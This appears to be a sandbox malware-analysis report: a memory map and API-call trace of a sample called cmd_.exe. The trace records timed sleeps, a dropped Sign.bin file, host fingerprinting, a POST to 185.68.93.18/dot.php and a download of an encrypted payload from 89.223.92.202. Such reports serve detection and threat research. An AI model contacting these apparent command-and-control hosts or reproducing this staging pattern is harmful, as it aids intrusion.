| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x001b0000 | 0x001ebfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001e6fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| tzres.dll | 0x00400000 | 0x00400fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00400fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00510000 | 0x0056bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00590000 | 0x0064ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00680000 | 0x0094efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| cmd_.exe | 0x01120000 | 0x0113ffff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001140000 | 0x01140000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ee0000 | 0x01ee0000 | 0x022d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x023fffff | Private Memory | rw |
|
|
|
- |
| wbemsvc.dll | 0x6f580000 | 0x6f58efff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x6f600000 | 0x6f609fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6f610000 | 0x6f627fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x6f630000 | 0x6f6c5fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x6f950000 | 0x6f9abfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x70f30000 | 0x70f35fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x71380000 | 0x713cefff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x713d0000 | 0x71427fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x71970000 | 0x71975fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x71d50000 | 0x71d57fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x71d60000 | 0x71d71fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x71d80000 | 0x71d8ffff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x731a0000 | 0x731d7fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x73220000 | 0x73226fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x73240000 | 0x7325bfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x73310000 | 0x73321fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x733f0000 | 0x733fffff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74590000 | 0x74594fff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x74750000 | 0x74757fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74820000 | 0x7485afff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74900000 | 0x74943fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x74a30000 | 0x74a35fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74a40000 | 0x74a7bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74a80000 | 0x74a95fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74ee0000 | 0x74efafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74f00000 | 0x74f0bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x74fa0000 | 0x74fadfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75020000 | 0x7502bfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75110000 | 0x7522cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75230000 | 0x75279fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x752b0000 | 0x753a4fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x753c0000 | 0x75488fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75490000 | 0x75499fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x754a0000 | 0x754edfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x754f0000 | 0x75524fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75530000 | 0x75603fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75610000 | 0x756acfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x756b0000 | 0x757e5fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75890000 | 0x75930fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75940000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x759f0000 | 0x76639fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76640000 | 0x7670bfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76710000 | 0x7686bfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76870000 | 0x768fefff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x769d0000 | 0x769d5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x769e0000 | 0x769f8fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76a00000 | 0x76bfafff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76c00000 | 0x76c1efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76c20000 | 0x76cbffff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x76e60000 | 0x76f9bfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x76fa0000 | 0x76ff6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77000000 | 0x77082fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x770a0000 | 0x770a0fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0x214
164
81
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-08-10 05:39:47 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 49857 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75530000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7558418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x75581e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x755876e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x75581f61 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75530000 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n39ju1 6cribq\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 260 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76c20000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x713d0000 |
|
1 | |
| Module | Load | module_name = Iphlpapi.dll, base_address = 0x73240000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x756b0000 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:39:48 (UTC) |
|
1 | |
| System | Sleep | duration = 120000 milliseconds (120.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:39:58 (UTC) |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n39ju1 6cribq\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 259 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:39:58 (UTC) |
|
1 | |
| System | Sleep | duration = 120000 milliseconds (120.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:40:08 (UTC) |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n39ju1 6cribq\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 260 |
|
1 | |
| File | Create | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Roaming\Intel\Sign.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Time | type = Ticks, time = 69950 |
|
2 | |
| System | Get Computer Name | result_out = o5zInUQXjZk, type = ComputerNameDnsHostname |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:40:08 (UTC) |
|
1 | |
| System | Sleep | duration = 300000 milliseconds (300.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:40:18 (UTC) |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Inet | Open Connection | server_name = www.download.windowsupdate.com, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /msdownload/update/v3/static/trustedr/en/authrootseq.txt, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 | |
| Inet | Open Connection | server_name = www.download.windowsupdate.com, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /msdownload/update/v3/static/trustedr/en/authrootstl.cab, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
|
1 | |
| Inet | Read Response | size = 3380, size_out = 3380 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Inet | Read Response | size = 5600, size_out = 5600 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
3 | |
| Inet | Read Response | size = 1704, size_out = 1704 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Inet | Read Response | size = 2334, size_out = 2334 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Connection | server_name = 185.68.93.18, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /dot.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.68.93.18/dot.php |
|
1 | |
| Inet | Read Response | size = 96, size_out = 96 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Connection | server_name = 89.223.92.202, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /mo.enc, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 89.223.92.202/mo.enc |
|
1 | |
| Inet | Read Response | size = 3798, size_out = 3798 |
|
1 | |
| Inet | Read Response | size = 6152, size_out = 6152 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
2 | |
| Inet | Read Response | size = 1136, size_out = 1136 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Inet | Read Response | size = 6408, size_out = 6408 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Inet | Read Response | size = 3488, size_out = 3488 |
|
1 | |
| Inet | Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Inet | Read Response | size = 3488, size_out = 3488 |
|
1 | |
| Inet | Read Response | size = 4722, size_out = 4722 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x75530000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75586596 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x75573b1a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75568a3b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x755833d3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExW, address_out = 0x75570f04 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Process32FirstW, address_out = 0x7556fa35 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x7558374d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Process32NextW, address_out = 0x7556faca |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindNextFileW, address_out = 0x7557963a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7556f731 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7557ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlushFileBuffers, address_out = 0x75567f81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x7557cc56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetSystemInfo, address_out = 0x75583728 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileW, address_out = 0x755853b2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x755876b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x76ecff51 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSize, address_out = 0x76eb9bec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x76eb2dd6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RtlUnwind, address_out = 0x75567f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFilePointer, address_out = 0x7557db36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteConsoleW, address_out = 0x755782f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetStringTypeW, address_out = 0x755867c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LCMapStringW, address_out = 0x755813d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75582fde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x7557bf00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7558452b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ExitProcess, address_out = 0x7558214f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = DecodePointer, address_out = 0x76ebcd10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x7557bb80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x755898ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x75572331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x7557cdcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7558ed38 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x75583d01 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75573ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x7557bbd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCPInfo, address_out = 0x75581e2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InterlockedIncrement, address_out = 0x7557bbc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InterlockedDecrement, address_out = 0x7557bbf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetACP, address_out = 0x755839aa |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetOEMCP, address_out = 0x75573db9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsValidCodePage, address_out = 0x7558c1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EncodePointer, address_out = 0x76eba295 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TlsAlloc, address_out = 0x755835a1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TlsGetValue, address_out = 0x7557da70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TlsSetValue, address_out = 0x7557da88 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TlsFree, address_out = 0x755813b8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x7557bb08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetStdHandle, address_out = 0x755bf589 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x76ea77a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75583939 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x76ea7760 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileType, address_out = 0x755875a5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x75581400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7558450e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetConsoleCP, address_out = 0x75582c8a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetConsoleMode, address_out = 0x75582412 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x76eb9ac5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryW, address_out = 0x75583c01 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetStdHandle, address_out = 0x75581e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75583c26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x7557ba46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetHandleCount, address_out = 0x75589911 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x75583891 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x755833f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x75581dc3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x75581dbc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapCreate, address_out = 0x75583ea2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapDestroy, address_out = 0x75572301 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x7557bb9f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x7557ba60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x7557cac4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = RaiseException, address_out = 0x7556eb60 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x753c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x753d67cf |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76c20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x76c3157a |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x76710000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoSetProxyBlanket, address_out = 0x76725ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x76759d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoInitializeSecurity, address_out = 0x76737259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoInitializeEx, address_out = 0x767509ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x767586d3 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x76870000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x76873eae |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x76873ed5 |
|
1 | |
| Module | Load | module_name = WS2_32.dll, base_address = 0x754f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ws2_32.dll, function = 57, address_out = 0x754fa05b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ws2_32.dll, function = 12, address_out = 0x754fb131 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ws2_32.dll, function = 115, address_out = 0x754f3ab2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ws2_32.dll, function = 52, address_out = 0x75507673 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 05:40:34 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 96143 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75530000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7558418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x75581e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x755876e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x75581f61 |
|
1 | |
